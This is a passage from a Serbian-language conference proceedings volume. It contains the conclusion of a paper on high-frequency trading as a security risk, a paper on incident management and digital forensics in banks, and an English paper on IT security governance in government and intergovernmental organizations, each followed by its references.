Obaveštajni model i filozofija počivaju na problemskoj orijentaciji (u policiji modi- fikovan izraženim hijerarhijskim komandnim modelom), u kojoj su analiza podataka i primarni podaci ključni za ostvarivanje cilja i proces odlučivanja. Ovaj model deluje u okviru mreže upravljanja informacijama i omogućava uticaj analitičara na donosioce odluka, a predstavlja metod dugoročnijeg preventivnog rešavanja problema [33]. Sektor bezbednosti je zatvorena i hijerarhijski ustrojena struktura, koja pociva na nacelu tajnosti u radu, a čija organizaciona struktura omogućava funkcionalnu sposobnost istovremenog obavljanja vis e poslova odje- dnom, a kljucni cilj svake organizacije je pravovremeno prilagođavanje promenama i sopstve- ni opstanak. U tom okviru, prikupljanje i analiza primarnih podataka, iziskuje fleksibilnost,



17

prilagodljivost, pa čak i istovremenu usmerenost ka više ciljeva, zbog čega iziskuju viši individualni domet i inicijativu [34]. Naime, promenom percepcije o prirodi pojave kao bezbednosnog izazova, ne menjaju se činjenice, već njihovo značenje. Zato, za novu percepciju, u uslovima oslanjanja na informacione tehnologije koje su bez moći logičkog rasuđivanja, problem predstavlja tajming, odnosno da se neko mora prvi suočiti sa definisanjem uskog i konkretnog segmenta koji bi činjenicama dao novo značenje [35]. Uspešnost organizacije de- terminišu ljudski resursi, koji realizuju zadatke neophodne za ostvarivanje cilja, što podrazumeva kompetentnost ljudi i njihovo motivisanje.

Dodatni problem predstavlja nemogućnost države da u globalnom kontekstu, tj. u okviru jače i dublje prekogranične saradnje i društvene integracije, obezbedi unutrašnju kohe- ziju i javna dobra (slabost države). Ključna odlika slabosti države je nefunkcionalnost, u okviru koje nacionalne elite iscrpljuju resurse. Slabost države se obnavlja pod uticajem među- narodnih mreža, koje su proizvod „novih ratova“, [36] nerazdvojno povezanih sa procesom globalizacije. Transnacionalne mreže, koje deluju kao globalni činioci, predstavljaju interio- rizaciju globalizacije, a posledica je osećaj kolektivne nacionalne nebezbednosti, delom i zbog funkcionalnosti slabe države [37].

7. ZAKLJUČAK

Potreba da države istražuju aktivnost svojih kreditora i svojih hartija od vrednosti proističe iz iskustva. Na primeru Grčke i Španije ispostavilo se da se velike investicione banke pojavljuju kao kreditori, a paralelno i kao trgovci državnim instrumentima na seku- ndarnom tržištu.

U matematici i fizici je moguće da se veličine beskonačno dele, da vreme teče konstantno i da se vrednosti menjaju ravnomerno, ali u svetu finansija to nije slučaj. Uprkos naizgled visoke stručnosti i tehnologije iza HFT-a, modeli na kojima se zasniva ne preva- zilaze nagađanje, što sistem globalnih finansija čini nestabilnim. Problem da se HFT prepozna kao bezbednosni izazov proizilazi iz pouzdanja u informacione tehnologije kao zamenu za zdrav razum i zakon [38].

Da bi se informacione tehnologije podvrgle ostvarivanju korisnih ciljeva, neophodno je informatički obrazovati kadrove i kontinuirano edukovati zaposlene, kako bi se postigla kritična masa kompetentnosti i sposobnosti percepcije, koja neće nekritički primenjivati apstraktne tehnološke mogućnosti koje ne moraju uvek voditi ostvarenju racionalnih ciljeva.

Informaciona veština nije dovoljna da se obezbedi zaštita društva od individualnih slabosti, neizbežnih čak i uz najkvalitetnije kadrove. Dobit koju omogućava HFT ostavlja prostor za raširenu korupciju, zbog čega je teško motivisati napore da se iznađu unutrašnji izvori kreditiranji, mimo globalnog finansijskog sistema. Posledica je urušavanje vrednosti ušteđevina, penzionih i zdravstvenih fondova, koji u jednom trenutku mogu da eskaliraju u nezadovoljstvo.

Informacione tehnologije omogućuju da se jednim pritiskom na taster ostvari prenos milijardi, ali i da do kraha dođe iznenadno. Stoga je nužan institucionalni razvoj organizacionih oblika administranja javnih poslova, koji bi bili adaptirani da, u skladu sa pravilima konkretne struke, blagovremeno percipiraju efekte i posledice primene novih informacionih tehnologija.



18

LITERATURA

[1] Farell Stephen; Signeuer, Jean Mark; Jensen, Christian, Security in Exotic Wireless Networks, u: Security and Privacy in Advanced Networking Technologies, Jerman-Blažič, Borka; Schneider, Wolfgang; Klobučar, Tomaž (Eds), Amsterdam: IOS Press, 2003, pp. v.

[2] Salomon, David, Elements of Computer Security, New York: Springer, 2010, pp. 17-18. [3] Smith, Sean, Hardware Security Modules, u: Handbook of Financial Cryptography and Security,

Rosenberg, Burton (Ed.), Boca Raton: CRC Press, pp. 258-259; takođe, Green, Thomas, Computer Security for the Home and Small Office, 2004, pp. 255.

[4] Statement of Wilson Thomas, director Defence Intelligence Agency, Global Security Envoirment, 02.02.2000, Current and Projected National Security Threats to the U.S: Hearing Before the Select Committee on Intelligence, U.S. Senate, Shelby, Richard (Ed), Diane Publishing, 2000, pp. 24.

[5] Đurđević, Dragan; Stevanović Miroslav, Problemi sa kojima se suočava IT sektor u borbi protiv pranja novca u Srbiji, FBIM Transactions 3:1 (2015), str. 185.

[6] Office of Financial Research 2013 Annual Report, U.S. Department of Treasury, 2013, pp. 2-3. [7] Patterson, Scott, High-Speed Stock Traders Turn to Laser Beams, The Wall Street Journal,

http://www.wsj.com/articles/SB10001424052702303947904579340711424615716 11.02.2014. [8] AOptix Intellimax MB2000. Pristup: http://www.aoptix.com/technology/mb2000/, 05.03.2014. [9] Vaananen, Jay, Dark Pools and High Frequency Trading For Dummies, John Wiley & Sons,

2015, pp. 90. [10] Anthony, Sebastian, New Laser Network Between NYSE and NASDAQ Will Wllow High-

frequency Traders To Make Even More Money, Extremetech, 14.02.2014. Pristup: http://goo.gl/uvyHB2, 05.03.2014.

[11] Myron, Scholes; Black, Fischer, Pricing of Options and Corporate Liabilities, Political Journal, 81:3 (1973). Ovaj rad prethodno je odbijen od više uglednih ekonomskih časopisa, sa obrazloženjem da nisu u mogućnosti da provere tačnost njihovih navoda. Termin „određivanje vrednosti opcija“ naknadno je uveo Robert Merton, Theory of Rational Option Pricing, Bell Journal of Economics and Management Science, 4:1 (1973). Šols i Merton su dobili Nobelovu nagradu za ekonomiju 1997. godine (Blek je ranije umro).

[12] Detalnjije: Durbin, Michael, All About High-Frequency Trading, New York: McGraw Hill Professional, 2010.

[13] Aldridge, Irene, High-Frequency Trading: A Practical Guide to Algorithmic Strategies and Trading Systems, II Edition, Wiley, 2013, pp. 3-4.

[14] Kaeppel, Jay, The Four Biggest Mistakes in Option Trading, New York: John Wiley & Sons, 2012, pp. 1.

[15] Fof, Richard, Information Technology: An Introduction for Today’s Digital World, Boca Raton: CRC Press, 2013, pp. 108-109.

[16] Bliže: Cvetković, Dragan, Informatika: Osnove softvera, Beograd: Fakultet za informatiku i menadžment Univerziteta Singidunum, 2009.

[17] Jacksona, Thomas; Dawsona, Ray; Wilsonb, Darren, Reducing the effect of email interruptions on employees, International Journal of Information Management, No. 23 (2003), pp. 55–65.

[18] Schwalbe, Kathy, Information Technology Project Management, VII Edition, Andover: Cengage, 2013, pp. 249.

[19] McKeown, Greg, Essentialism: The Disciplined Pursuit of Less, London: Random House UK Limited, 2014.



19

[20] Costas Jana; Grey, Christopher, Outsourcing Your Life: Exploitation and Exploration in the „4-Hour Workweek“, u: Managing 'Human Resources' by Exploiting and Exploring People's Potentials, Holmqvist, Mikael; Spicer, Andre (Eds), Bingley: Emerald Group Publishing, 2013, pp. 227, 232.

[21] Đorđević, Gordana, Uticaj informacionog društva na društveno ekonomski razvoj, Socioeconomica, 1/2 (2012), pp. 198.

[22] Analiza društvene strukture i dinamike zapadne civilizacije u: Weber, Max, The Theory of Social and Economic Organization, New York: Free Press, 2012 (Original: Wirtschaft und Gesellschaft, Oxford University Press, 1947).

[23] Wiener, Norbert, The Human Use of Human Beings: Cybernetics and Society, New York: Da Capo, 1950, pp. 24, 34. Po Vineru, ljudska društva i mašine teže da se odupru entropiji kroz organizaciju sistema, koji naziva „komunikativni organizmi“ (u savremenoj terminologiji informacioni sistemi), koji su sposobni da prilagode buduće ponašanje, na osnovu prošlih performansi. On prepoznaje rizik koncentracije moći u rukama beskrupuloznih.

[24] Galloway, Alexander, Protocol: How Control Exists After Decentralization, Cambridge: MIT Press, 2004, pp. 114.

[25] Hindeman, Matthew, prema: Dijk Jan van, Digital Democracy: Vision and Reality, u: Public Administration in the Information Age: Revisited, Snellen, Ig; Thaens, Marcel; Donk, Wim van de (Eds.), IOS Press, 2012, pp. 50-51.

[26] Štambuk, Vladimir, Communico ergo sum ili Internet: kako je nastao i kuda smera, Beograd: Akademska misao, 2010, str. 137. Pre Interneta bio je ARPAnet, koji je američka vojska 1981. godine pretvorila u „javnu mrežu za prenos podataka dostupnu za besplatno korišćenje svakog ko je zainteresovan“. EU je 2005. godine inicirala da se za upravljanje Internetom ovlasti Međunarodna telekomunikaciona unija (ITU), ili UN, ali je američki predstavnik u ITU je ovakav predlog odbio. Nakon bega Edvarda Snoudena postalo je jasno i zašto.

[27] Harknett, Richard, Integrated Security: A Strategic Problem to Anonimity and the Problem of the Few, u: National Security in the Information Age, Goldman, Emily (Ed), London: Psychology Press, 2004, pp. 18-28.

[28] Mijalkovaki, Milan, Protivteroristička prevencija države, Međunarodni problemi, 59:1-4 (2007), str. 579, 581.

[29] Pandya, Jayshree, The Global Age: NGIOA @ Risk, New York: Springer Science & Business, 2012, pp. 255.

[30] Whelan, Chad, Networks and National Security: Dynamics, Effectiveness and Organisation, Farnham: Ashgate Publishing, 2013, pp. 39-44, 85.

[31] Final Report of the National Commission on Terrorist Attacks Upon the United States, pp. 74 [32] Čerović, Slobodan, Makroekonomija, Beograd: Singidunum, 2009. [33] Ratcliffe, Jerry, Intelligence-led Policing, New York: Routledge, 2008, pp. 89. [34] Bailes, Alyson, Terrorism and International Security Agenda Since 2001, u: Combating

Terrorism and Its Implications for the Security Sector, Winkler, Theodor; Ebnöther, Anja; Hansson, Mats (Eds), Geneva: DCAF, 2005, pp. 23.

[35] Drucker, Peter, Innovation and Entrepreneurship, New York: Routledge, 2012 , pp. 94-97. [36] Kaldor, Mary, New and Old Wars: Organised Violence in a Global Era, Oxford: Oxford Polity, 2001. [37] Kostovicova, Denisa, Slabost drzave na Zapadnom Balkanu kao pretnja bezbednosti: Pristup

Evropske unije i perspektiva globalne politike, Bezbednost Zapadnog Balkana, Br. 7-8 (2008), str. 10-16.

[38] Stewart, Ian, In Pursuit of the Unknown: 17 Equations That Changed the World, New York: Profile, 2012, pp. 306-316

21

OTKRIVANJE I RAZJAŠNJAVANJE VANREDNIH IT BEZBEDNOSNIH DOGAĐAJA U BANCI

DETECTING AND RESOLVING EXTRAORDINARY IT SECURITY EVENTS IN BANKS

Dr Viktor Kanižai3

Abstract: Information Technologies (IT) represent the basis of modern banking infrastructure - databases, communication flows, current data processing, always available access to the services and products of the bank. Taking into account the fact that extraordinary events in the functioning of IT can cause direct material and reputation losses, the usage of IT infrastructure in banking carries a high degree of risk. It is necessary to establish an adequate model for detecting and resolving extraordinary IT security events in the bank to always know the actual facts and take preventive measures in order to avoid breaches of confidentiality, integrity and availability of data in the future. The author in this paper explored the possible sources of knowledge and methodology of incident management and conducting internal investigations, and examples are given of forensic tools that are used in practice.

Key words: extraordinary IT security events, data protection, internal investigations, digital forensics

Sadržaj: Osnovu savremenog bankarskog poslovanja predstavlja infrastruktura Informa- cionih Tehnologija (IT) – neophodne su baze podataka, komunikacioni tokovi, trenutačna obrada podataka, uvek dostupan pristup servisima i proizvodima banke. Uzimajući u obzir i činjenicu da vanredni događaji u funkcionisanju IT-a mogu prouzrokovati direktne materijalne i reputacione gubitke, upotreba IT infrastrukture u bankarstvu nosi veliki stepen rizika. Neophodno je uspostaviti adekvatan model otkrivanja i razjašnjavanja IT bezbednosnih vanrednih događaja u banci kako bi se uvek znalo stvarno činjenično stanje i preduzele preventivne mere kako do narušavanja poverljivosti, integriteta i dostupnosti podataka u buduće ne bi došlo. Autor je kroz ovaj rad sagledao moguće izvore saznanja i metodologiju upravljanja incidentima i sprovođenja internih istraga, a dati su i primeri forenzičkih alata koji se u praksi koriste.

Ključne reči: vanredni IT bezbednosni događaji, zaštita podataka, interne istrage, digitalna forenzika

3 OTP banka Srbija a.d. Novi Sad, Novi Sad, [email protected]

Otkrivanje i razjašnjavanje vanrednih IT bezbednosnih događaja u banci

Zbornik radova Viktor Kanižai

22

1. U V O D

Banka kao finansijska institucija danas predstavlja neophodnost i potrebu svakog subjekta u društvu, bilo fizičkih ili pravnih lica. Savremeni bankarski sistem neminovno podrazumeva razvoj i primenu informacionih tehnologija, jer gotovo da u današnje vreme nema nijednog procesa koji se u banci odvija, a da to ne iziskuje upotrebu računara i računarskih sistema.

Sa druge strane vanredni događaji u funkcionisanju informacionih tehnologija mogu prouzrokovati direktne materijalne i reputacione gubitke, pa tako upotreba informatičke infrastrukture u bankarstvu nosi veliki stepen rizika. Potrebno je obratiti posebnu pažnju na priro- du poverljivosti, verodostojnosti i bezbednosti podataka kojima informacioni sistem banke upravlja, baš kao i na njihovu raspoloživost i opasnosti koje prete njihovoj funkcionalnosti. Samim tim, neophodno je uspostaviti adekvatan model otkrivanja i razjašnjavanja IT bezbednosnih vanrednih događaja u banci.

2. POJAM INCIDENTA I VANREDNOG DOGAĐAJA

Neophodno je jasno definisati šta je IT bezbednosni incident, a šta vanredni događaj, kao i ukazati koji su mogući izvori saznanja istih. U literaturi se ova dva pojma često mešaju i istovetuju, a ovde su date definicije na osnovu bezbednosnih standarda i sprovedenih istraživanja u vezi upravljanja incidentima u bankarskom sektoru:

− IT bezbednosni incident: Nepovoljna promena u bezbednosti IT sistema koja može narušiti ili već narušava poverljivost, integritet, autentičnost, funkcionalnost ili raspoloživost podataka. Npr. pojava virusa na računaru koji je automatski odstranjen antivirusnom zaštitom, neuspeli pokušaj napada na web sajt banke putem interneta koji je sprečen sistemom za prevenciju upada, itd.

− IT bezbednosni vanredni događaj: Svaki IT bezbednosni incident koji rezultuje štetu za banku, koji ukazuje na osnove sumnji na kriminalno ugrožavanje banke, koji zahteva preduzimanje dodatnih, neautomatizovanih mera, ili koji je visoko rizičan predstavlja IT bezbednosni vanredni događaj. Npr. pojava virusa na raču- naru koji nije uklonjen antivirusnom zaštitom, uspešno izveden napad na web sajt banke, povreda odredbi pravilnika iz oblasti IT bezbednosti, itd.

2.1. IZVORI SAZNANJA

Izvori saznanja o IT bezbednosnom incidentu mogu biti posredni ili neposredni. Svaki zaposleni može saznati za IT bezbednosni incident, bilo prouzrokovanjem, ili uočavanjem istog, kao i tako što je zaposleni video da drugo lice prouzrokuje incident ili je posredno obavešten o takvom slučaju. Takođe, IT bezbednosni incident može uočiti nadležni zaposleni raspoređen na poslove iz oblasti IT bezbednosti, monitoringom IT bezbednosnih sistema, kontrolom sistema, analizom logova, putem prijave od drugih lica, kao i zaposleni u Sektoru za IT monitoringom svih IT sistema.

2.2. FAKTORI RIZIKA

Nijedan IT sistem nije bez rizika i ne mogu sve implementirane mere eliminisati rizik, ali mogu smanjiti rizik na prihvatljiv nivo.



23

Sa fokusom na izvore pretnje, može se zaključiti da oni sa jedne strane mogu biti: − interni, − eksterni i − kombinovani.

Sa druge strane mogu se svrstati u tri grupe:

− Ljudski (namerni ili ne: nemar, sabotaža, špijunaža, neznanje, itd.). − Izvori pretnji iz okruženja (dugoročni nestanak struje, ratno stanje, kvar na

hardveru, itd.). − Prirodni izvori pretnji (poplava, zemljotres, itd.).

Najveći rizik u banci predstavljaju interni faktori, tj. sami zaposleni banke. Oni su ti koji imaju konstantan pristup podacima i koji te podatke mogu zloupotrebiti za pribavljanje pro- tivpravne materijalne koristi sebi ili drugima i/ili nanošenje materijalne štete za banku. Najveću štetu mogu naneti kombinovani izvori pretnji (saradnja kriminalaca sa zaposlenim banke).

3. UPRAVLJANJE INCIDENTIMA

Postupci vezani za uočavanje, otklanjanje i sprečavanje incidentnih situacija moraju biti razrađeni i definisani kako bi zaštita podataka i IT sistema banke bila i metodološki određena na sistematizovan način.

Generalno, bez obzira na veličinu banke i broj zaposlenih, svako saznanje o IT bezbednosnom incidentu treba da se prijavi nadležnoj OJ, koja procenjuje da li se radi o IT bezbednosnom vanrednom događaju, ili samo o incidentu. Ukoliko se radi o IT bezbednosnom incidentu, a ne i vanrednom događaju, tada nadležna OJ registruje događaj i prikuplja podatke potrebne za redovno izveštavanje manedžmenta banke o istim. Ukoliko se radi o IT bezbednosnom vanrednom događaju, nadležna OJ o slučaju obaveštava nadležne rukovodioce i nala-že se otklanjanje uočenog problema (prestanak trajanja vanrednog događaja), određuju se mere interne istrage u cilju utvrđivanja stvarnog činjeničnog stanja. Nakon završene interne istrage sastavlja se izveštaj o vanrednom događaju i daju se predlozi mera za trajno otklanjanje problema i sprečavanje ponavljanja takvih i sličnih događaja u budućnosti. Izveštaj se dostavlja nadle- žnim rukovodiocima, i zavisno od težine ispitanog događaja, i predstavnicima višeg mena- džmenta. Takođe, u težim oblicima ugrožavanja banke, potrebno je oformiti u lokalni CERT.

4. INTERNE PROVERE

Interno istraživanje prevashodno ima za predmet utvrđivanja činjenica o pretnji nekog IT bezbednosnog događaja ili je on već nastao usled propusta na internom planu zaštite banke.

4.1. ZNAČAJ I CILJ INTERNIH PROVERA

Internim istražnim delatnostima se utvrđuje stvarno činjenično stanje, odnosno mate- rijalna istina, povodom IT bezbednosnog vanrednog događaja ili pretnji od štete, odnosno gubitka za banku.



24

Za izvršavanje ovih zadataka neophodni su stručni i specijalizovani kadrovi u banci. To dalje nameće potrebu novih zapošljavanja, novih investicija kako bi se poslovni procesi banke na adekvatan način zaštitili.

4.2. DOKUMENTOVANJE SPROVEDENIH ISTRAGA

Interna istraga ima širi i sveobuhvatniji karakter, odnosno nije ograničena isključivo na otkrivanje IT bezbednosnih vanrednih događaja, nego se ona vrši i radi prikazivanja stvarnog stanja menadžmentu banke, ali i za utvrđivanje pitanja radne odgovornosti zaposlenih u banci zbog eventualnih propusta koje su učinili pa je zbog toga došlo do vanrednog događaja. Da bi izveštaj o sprovedenoj internoj istrazi sadržajno bio sveobuhvatan i odražavao stvarno činjenično stanje najprihvatljivije je da se tokom internog istraživanja odgovori na devet zlatnih pitanja kriminalistike (Šta se desilo?, Gde se desilo?, Kada se desilo?, Kako se desilo?, Čime je izvršeno?, Sa kime je izvršeno?, Zašto je izvršeno?, Nad kime (čime) je izvršeno?, Ko je izvršilac?). Svakako je važno dati odgovor na svih devet zlatnih pitanja kriminalistike, i ne samo dati odgovor, nego je za svaku utvrđenu činjenicu neophodno obezbediti dokaze ili ukazati na put koji vodi do istih.

4.3. OBEZBEĐIVANJE DOKAZA

Da bi se dokazalo delo neophodno je prikupiti dokaze, a oni generalno mogu biti: − Lični i − Materijalni

Digitalni dokaz mora ukazati na CIA trojstvo podataka (CIA – Confidentiality, Integrity, Availability; Poverljivost (autentičnost), integritet i dostupnost).

Za zaštitu i verifikaciju integriteta digitalnih dokaza koristi se jednosmerna matema- tička funkcija, ili algoritam ‐ heš (eng: hash) fajlova. Ova se funkcija lako računa u jednom, ali teoretski nikakao u drugom smeru. Ako se izračuna heš jednog fajla dobije se vrednost he- ša, koja je istovetna vrednosti dobijenoj kod verifikacije heša istim algoritmom, samo ako se fajl nije menjao. Svaka, pa i najmanja promena u sadržaju fajla, menja vrednost heša, što ukazuje da je integritet narušen. Najviše se koriste dva algoritma za heširanje: MD5 i SHA1. Verovatnoća da dva fajla sa različitim sadržajem imaju isti MD5 heš je 2128[1].

Generalno, opšti koraci obezbeđivanja digitalnih dokaza su: − Snimanje zapisa − Snima se zapis koji predstavlja podatke od interesa. U slučaju potrebe snimanja

celokupnog medija sa podacima, pristupa se imidžovanju4. − Analiza podataka − Vrši se analiza snimljenog zapisa, tj. podataka na tom zapisu u cilju pronalaženja

potencijalnih dokaza. − Tumačenje informacija − Analizom podaci postaju informacije, i one se tumače u smislu ukazivanja na

činjenice povodom ispitivanog događaja. 4 Imidžovanje – predstavljanje ili reprodukcija objekta, uzimanje fizičke slike (imidža) ispitivanog računara, tj. generisanje dulpikata bit po bit.



25

− Predstavljanje dokaza − Na kraju procesa obezbeđivanja dokaza dolazi se do samog predstavljanja tih

dokaza, menadžmentu banke ili nadležnim državnim organima, zavisno od slučaja. Treba imati na umu i da postoje anti-forenzički alati koji otežavaju posao nadležnog

lica koji sprovodi internu istragu. Kriminalci često maksimalno koriste prednosti nove tehnologije i usavršavaju svoje ilegalne aktivnosti, prevazilazući znanja operativca istrage.

Nažalost u Republici Srbiji nije pravno regulisana materija digitalnih dokaza, tako da predstavljanje ovakvih dokaza zavisi od slučaja do slučaja: banke uređuju to pitanje interno, a kod nadležnih državnih organa ovo pitanje zavisi od sudije datog procesa – da li će prihvatiti iskaz o izvršenoj analizi logova, prihvatiti logove u formi Excel tabele bez verifikacije integriteta podataka, preuzeti računar, itd.

5. ALATI DIGITALNE FORENZIKE

Uopšteno, alate kojima se mogu vršiti forenzička istraživanja na računarima za koje se sumnja da su bili predmet, objekat ili sredstvo izvršenja zloupotreba iz oblasti visokotehnološkog kriminala možemo grupisati na one koji se pokreću npr. sa CD-a, bez podizanja operativnog sistema, i na one koji se pokreću iz operativnog sistema.

Primeri alata koji se u praksi koriste, a koji se pokreću bez prethodnog podizanja operativnog sistema su:

− Hiren’s Boot CD − Caine − Backtrack

Slika 1: Skup forenzičkih alata u Backtrack



26

Primeri alata iz prakse, a koji se pokreću iz operativnog sistema su: − OSForensics − WinHex − DiskDigger − FocaPro

Slika 2: Osnovni meni alata OSForensics

6. ZAKLJUČAK

Poslovni procesi banke sve više zavise od ispravnog funkcionisanja informacionog sistema banke. Vanredni događaji iz oblasti IT bezbednosti mogu naneti velike direktne materijalne i reputacione štete banci.

Neophodno je uspostaviti adekvatan model otkrivanja i razjašnjavanja IT bezbednosnih vanrednih događaja u banci.

Vanredne događaje ne treba zataškavati, već ih otkriti i razjasniti, jer se samo tako može utvrditi stvarno činjenično stanje i dati predlog mera kako se takvi i slični događaji ne bi ponovili u budućnosti.

Za otkrivanje i razjašnjavanje vanrednih IT bezbednosnih događaja u banci neophodni su stručni i specijalizovani kadrovi u banci, kao i odgovarajući tehničko – tehnološki alati. To nameće potrebu za novim zapošljavanjima, novim investicijama, ali to ne treba da predstavlja dodatni trošak, već investiciju za banku.



27

LITERATURA

[1] Prof. dr. Milan Milosavljević, Doc. dr. Gojko Grubor, Digitalna forenzika računarskog sistema,

Univerzitet Singidunum, Beograd, 2009. [2] Doc. dr Marinko Kresoja, Zlatko Kirkov, Kriminalističke i krivično procesne karakteristike

internih istraga u banci, Međunarodna naučno-stručna konferencija Kriminalističko-forenzička istraživanja, Banja Luka, Bosna i Hercegovina, Volumen 4, broj 1, ISBN 978-99955-691-1-2, 2011.

[3] Aleksić Ž., Škulić M., Kriminalistika, Pravni fakultet Univerziteta u Beogradu, Centar za izdavaštvo i informisanje, 2011.

[4] Doc. dr Marinko Kresoja, Viktor Kanižai, Kriminalističko operativni karakter dokaza pravljenja i unošenja kompjuterskih virusa u informacioni sistem banke, Međunarodna naučno-stručna konferencija Kriminalistički i krivično procesni aspekti dokaza i dokazivanja, Sarajevo, Bosna i Hercegovina, Volumen 6, Broj 1., ISBN 978-99955-691-8-1, 2013.

[5] Krivokapić V., Uvod u kriminalistiku, Nadedesign, Narodno delo Beograd, 2008. [6] Petrović R. S., Kompjuterski kriminal, II izdanje, Ministarstvo unutrašnjih poslova Srbije,

Beograd, 2001.

29

IT SECURITY IN GOVERNMENT AND INTERGOVERNMENTAL ORGANIZATION

Mr.sc , Gorjan Damjanovic, OPCW, Johan de Wittlaan 32, Den Haag, [email protected] Mr.sc , Ilhan Muratovic, Srednja skola Novi Pazar, Ulica Save Kovacevica bb, [email protected] Mr.sc , Alma Damjanovic, The International School of The Hague, Wijndaelerduin 1, Den Haag, [email protected]

Abstract (Introduction)

Cyber security in today's age of Internet is the biggest challenge faced by all Internet users as well as government institutions and organizations, and international organizations, founded by the countries, or to be more specific, member states of the organization, regardless if organized at the regional, international or global level.

Being that Internet a live matter that changes and improves on a daily basis, and that base could extend to a longer period of time, ensuring the safe use of the Internet and IT networks, is a major challenge for the professional IT Security Department of any organization.

Unfortunately, the legislation of organizations and institutions, which are expected to follow the challenges of today’s safe use of the Internet, is quite slow by the mode or method of implementation of its decisions, and is mostly known as firefighting. (mostly reactive instead of active)

Dynamics and development of the Internet and IT technology, its benefits and risks, must be taken seriously in the same way and pace, by the leaders of those organizations and institutions, which, mostly, has not been the case so far. We will address these cases further below.

Difference between Business and Private use of the Internet and Introduction to a Local Network

Unlike private Internet users, where each and every individual user, bears the responsibility and consequences of Internet use, Internet in the organizations and institutions, represents, as with any business system, a challenge, which requires economic and political will and understanding by the governing body of the same organization or institution. The understanding primarily consists of awareness that the Internet and all communications being carried over require resources.

In addition to IT managers, who should adequately, present to Executive Mana- gement, Internet and the complete network system of the organization, that usually represent a whole system, should be understood by the management as a separate and complex system, and not a one-time expense, i.e. " buy and forget", hoping it will work itself out.

Unfortunately, quite often, due to the lack of knowledge from all parties, and lack of proper presentation of their complex system, the IT managers are often misunderstood. Again, there is need to stress the potential consequences of such misunderstanding that can lead, at the end, to organizational disaster.

IT security in government and intergovernmental organization Zbornik radova Goran Damjanović; Ilhan Muratović; Alma Dajmanović

30

External threats

The threats that come from outside of the network, or the Internet, have usually been classified, into the three main groups:

• 1. Spam • 2. Viruses and Malware • 3. Phishing Scams

Solution as firewall, for example, is one of the security systems, but serious organization cannot rely only on it or on one type of a security system only. Firewall will block sniffing attacks, but in other hand, if there is no encryption of the data that fluctuate on the network, there is a risk of their interception.

Each of these threats to the network and users is a separate topic, so we are only going to mention them here.

Internal threats:

− Example of potential problems − Intentional and not intentional internal attacks Example of potential problems (The Human Contribution to Network Breach) Adoption of any form of portable memory devices in the organization is a major risk

for the network. Although this specific issue is mentioned many times before, it seems that it will never be enough. Regardless of the constant warnings, same mistakes and omissions occur on daily basis.

These are the two most common problems that arise in almost all institutions: • 1. End user returns the USB memory card and easily plugs into a computer / network. • 2. The user brings a laptop and connects to the network. Intentional and not intentional internal attacks Also, except for the two most common issues, persistent problems are 'emerging'

peripheral devices that behave as multi machines and present a major risk to the network.

Resources required for the safe operation and the Internet use

Material resources

In this case we are talking, of course, about the Hardware and Software solutions, which require constant monitoring, maintenance, upgrade and replacement, if necessary.

Human resources

Represent loyal professionals who possess safety certificates such as CISSP (Certified Information Systems Security Professional) and CISM (Certified Information Security Manager).


31

It should be noted that the state, government and international organizations should avoid the popular outsourcing, as they are generally in possession of sensitive, classified and secret information that are not meant for public and certainly not for other countries.

Outsourcing in this case would potentially represent an additional risk to the system.

Material resources and expectations

Manufacturers of hardware and software solutions, in general, are private companies. That does not mean that we should absolutely rely on them, primarily for two reasons.

First, that the company engaged in writing computer codes, hardware production on which these codes work, companies that provide information data, and those that build and “hold" or monitor and deal with the prevention of attacks on the internal network, do not give a guarantee or insurance on usage, as strange as it may sound. This legal restriction (protection) goes so far as they do not take the responsibility for the loss of data, even if they should, as a responsible company, as these same codes may be written carelessly, and in the whole process of production these deficiencies may not be detected and corrected.

All costs incurred at the end are on the end user's expense. Secondly, although the companies’ private entities, they may not be completely

independent from the influence of government and state institutions, in which they are operating. The easiest examples to mention are the two leading companies engaged in the production of an anti-virus solution, McAfee and Kaspersky.

In any case, products like security solutions and equipment should be selected as the most stable, with highest quality and most optimal, without favoritism, but also avoiding semi-solutions and unknown companies. IT managers should have the main role in management presentations. Primary consideration in presentation should be Interest and wellbeing of the institution, and consistently pose of security system, as a whole.

Human resources and expectations

Here we have to look again at IT professionals who in any case have to be an integral part of the institution or organization, and represent the first and the last line of defense, protection of data and information, or electronic flow of information. It should be emphasized how the information that exist in government and international institutions are important and, in vast majority, the sensitive nature for the particular country or countries.

In the selection of solutions, it is important to avoid surplus security solutions and reli- ance on one company only, or in the case of international organizations on companies that arrive from only one Member State. In most cases, we can surely say that such solution will re- ceive resistance from other Member States, as a result of political as well as economic reasons.

As mentioned above, we can conclude that IT professionals must consider political aspect of its security solutions that certainly represents an additional challenge.

Sub factor: IT managers

One of the key factors in any security system is understanding of the needs by the IT manager, his/her awareness and familiarity with the complete system, as well as basic knowledge. Basic knowledge is fundamental IT knowledge, which is prerequisite for potential problems


32

understanding. Unfortunately, few IT managers possess those. They usually tend to focus on the application layer. Wrong focus leads them, almost unconsciously, to the level of the end user.

Also, keeping their focus on the economic aspect only, and not understanding all aspects of the department, very important in today's world, produce fatal errors which may reflect to the entire company / organization.

As any new manager in new environment, trying to bring the new ideas “to impress the executive management”, without full evaluation of the current situation and potential opportunities first, often ends their potentially successful career before it began.

A solution to these potential issues may be instituting a position of a CIO (Chief Information Officer) as a person responsible and accountable for decision-making, as well as proposing a road map for the organization.

Basic methods of protection and safeguarding

All governmental organizations or internal institutions should uphold these eight basic protection methods:

− Policy − Physical security − Identification and authentication − Authorization − Network access control − Communication − Monitor and audit − Secure management

Conclusion

It is noteworthy that one of the important factors to prevent possible incidents on the network is human factor, shaped of qualified IT professionals, as well as awareness, education and training of users and themselves in periodic cycles and depending on the estimation of potential danger evaluated by IT manager of institution or organization.

Taking Internet for granted, especially from the end users' perspective, and in organizations where these same users rely on the security systems of its organization often leads to surprises when problems arise because of no familiarity, no knowledge, no information or lack of training.

Blaming the IT experts by the end users is not uncommon, and is often seen. They are right only in case that they are not informed, trained. It is better to prevent then repair, even in case that you look bad in eyes of the end users. The end users, in eyes of IT professionals, are quite often presented as potentially unconscious, or deliberate internal attackers.

Although Internet is a relatively young, a bit more than 20 years, the speed of its development and expansion, as well as dangers that represent side effect for users, are unprecedented in human history.

To conclude, the latch is still on the beneficial side of the scale for the mankind, but for how long - the time will tell.


33

References:

− The White House, “International Strategy for Cyberspace: Prosperity, Security, and Openness in a Networked World,” May 2011, http://www.whitehouse.gov/sites/default/files/rss_viewer/international_strategy_for_cyberspace.pdf

− Sue Talley, “Cyber Warfare, Education is Our Most Powerful Weapon,” The Huffington Post, December 12, 2012, http://www.huffingtonpost. com/sue-talley-edd/in-cyber-warfare-education_b_2244950.html

